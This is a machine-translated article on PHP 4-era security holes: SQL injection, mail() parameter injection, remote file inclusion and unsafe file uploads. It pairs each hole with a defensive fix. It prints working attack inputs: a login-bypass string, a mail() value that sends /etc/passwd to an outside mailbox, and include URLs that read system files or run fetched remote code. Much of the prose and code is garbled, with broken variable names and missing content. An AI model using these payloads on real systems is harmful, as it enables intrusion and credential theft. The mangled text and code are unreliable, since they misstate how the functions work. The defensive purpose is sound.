Shaun Clowes's article exploiting Common vulnerabilities in PHP applications did write great,
Considering a lot of aspects, I just incompatible this article, adding some other questions that I didn't mention. This article focuses on solving problems, rather than
Attack.
1. Old Cheat SQL statements
In the default mode, even if you forget to copy the php.ini to/usr/local/lib/php.ini, PHP opens the Magic_quotes_gpc=on.
The single quotation mark ('), double quotation mark ("), backslash backslash (), and null character nul for all variables from Get/post/cookie
(The null byte) is prefixed with a backslash to enable the database to query correctly.
However, when PHP-4-RC2 introduced a configuration file php.ini-optimized, this optimized php.ini is
Magic_quotes_gpc=off's. Some network management can see the optimized words may put php.ini-optimized copy to
/usr/local/lib/php.ini, it is more dangerous at this time. Like relatively simple validation, assume that no necessary characters are filtered:
SELECT * FROM login where user= ' $HTTP _post_vars[user] ' and pass= ' $HTTP _post_vars[pass] '
We can enter 1 ' or 1 = ' 1 in the User box and password box to validate. This is a very antique method, and this statement will
Replace with this:
SELECT * FROM login where user= ' 1 ' or 1= ' 1 ' and pass= ' 1 ' or 1 = ' 1 '
Because or 1 = ' 1 ' was established, so passed.
The best way to do this is to filter all the unnecessary characters, and it is recommended for Get/post/cookie and used in SQL
Add a custom function to the variable:
function Gpc2sql ($STR) {
if (GET_MAGIC_QUOTES_GPC () ==1)
return $str;
Else
Return addslashes ($STR);
}
It is mainly for your program to be safe to transplant in various systems.
2. The fifth parameter of the mail function
In php-4.0.5, the Mail function introduces a fifth parameter, which is used to set additional command-line arguments when the message is actually sent.
But there is no good checking of the Special Shell command character, so there is a big problem with executing the command. As the example in the Handbook:
Mail ("nobody@aol.com", "the subject", $message, "from:webmaster@ $SERVER _name", "-fwebmaster@ $SERVERNAME");
This is problematic if $server_name=;mail san@xfocus.org </etc/passwd can send the machine's password
It's in my mailbox.
Here is a reminder, there are several examples of PHP manual security issues, we actually use the time do not copy, it is just a demonstration function
Basic function, understanding it is possible.
For the mail function of this problem, the simplest we do not need this fifth parameter, to use to filter the illegal word such as (;), there is the modification
PHP Source Package Program EXT/STANDARD/MAIL.C, add the following line before if (extra_cmd! = NULL) {:
Extra_cmd=null
and then recompile.
3. UNIX version of require, include function
The Require and include functions of the win version are not supported for HTTP and FTP remote files, and the UNIX version defaults to support remote include files.
Require and include no matter what extension you are in, include you in it as part of the program to execute.
We use many require or include functions when writing programs for modularity of programs and portability of programs.
And sometimes variables are used as parameters, for example: include ("$something"); If the user can control the $something parameter at this point, the
If the parameters are not filtered, it will be miserable.
First of all, you can see any web users have Read permissions to the file, assuming this program is called http://victim/test.php, so we can use the following
URL:HTTP://VICTIM/TEST.PHP?SOMETHING=/ETC/PASSWD See the/etc/passwd file.
You can also execute commands by using the features that their remote files contain. For example, I set up a file under the www.xfocus.org test.php, the content is:
, then I can use the following URL:
Http://victim/test.php?something=http://www.xfocus.org/test.php?cmd=uname this way to run any
The order of the Italian.
phpMyAdmin also has this problem, and we can use it to look at any file we want to see. But it uses file_exist before the include.
The function determines whether the file exists, and this file_exist does not support remote files, so the second method above cannot be used directly. But we
Apache logging can be used to request a URL with PHP code, so that something specified as Apache log can also execute the life
, but Apache logs are usually larger and have too much clutter.
Http://www.securereality.com.au/sradv00008.txt referred to the method is more ingenious, in the form of file upload to the local
The execution command of the script upload, will be in the server file upload temporary directory to produce php8ta02i such as file name, because the file is present
, so you can execute the script in the upload file through the File_exist function.
Therefore, for the include, the use of the Require function must be careful, especially to include the file with parameters specified in this way, parameters must not
Let the user to control. There is also the ability to remove remote files by modifying the php.ini file. This was used before php-4.0.3.
Disable-url-fopen-wrapper is closed in a later version with Allow_url_fopen = off.
4, Disable_function
A functional disable_functions has been introduced in Php-4.0.1,php.ini, which is useful and can be used to prohibit some functions.
For example, in php.ini, add disable_functions = PassThru exec System Popen So when you execute these functions
Only Warning:system () has been disabled for security reasons will be prompted.
Alas, there is no way to execute a system command. Because PHP uses a lot of Perl features, such as the ability to use (') to execute commands:
$output = ' Ls-al ';
echo "
$output
";
?>
This is only set to Safe_mode to avoid, but the hateful safe_mode is too restrictive, do other things are also a bit of an inconvenience.
5. File Upload
PHP File Upload problem has been described in the article http://www.securereality.com.au/sradv00001.html is very clear,
This is indeed a more serious problem, generally we want to upload files will also be placed in the Web directory, so it is easy for attackers to get some of the system's web users
Can read the file.
Fortunately, the Is_uploaded_file and Move_uploaded_file functions were provided after php-4.0.3. So php-4.0.3 upload text above
Pieces of the program must not use the copy function, with Move_uploaded_file instead, it will check whether the file is uploaded. If it's php-4.0.2,
And the following, it is recommended to add a function before copy:
function Is_uploaded_file ($filename) {
if (! $tmp _file = Get_cfg_var (' Upload_tmp_dir ')) {
$tmp _file = dirname (Tempnam (","));
}
$tmp _file.= '/'. basename ($filename);
/* User might has trailing slash in php.ini ... * *
Return (ereg_replace ('/+ ', '/', $tmp _file) = = $filename);
}
This vulnerability in the security focus for a long time, just before copy has a lot of verification of a, judge of the statement, so that the attack is quite difficult, hehe.
Also, do not use environment variables, cookie variables, session variables and so on as the relationship between life and death criteria, because these variables are too easy to forge.
Hehe, more things at hand, the other slowly thought of adding it, but also welcome other comrades arbitrarily add changes.
Reference documents
1, PHP 4 ChangeLog (http://www.php.net/ChangeLog-4.php)
2, A Study in scarlet-exploiting Common vulnerabilities in PHP applications
(Http://www.securereality.com.au/studyinscarlet.txt) and analysist translations.
3. Remote command execution vulnerabilities in PhpMyAdmin and Phppgadmin
(Http://www.securereality.com.au/sradv00008.txt)
http://www.bkjia.com/PHPjc/446933.html www.bkjia.com true http://www.bkjia.com/PHPjc/446933.html techarticle Shaun Clowes article exploiting Common vulnerabilities in PHP applications did write great, considering a lot of aspects, I this article just incompatible, add some other not how ...
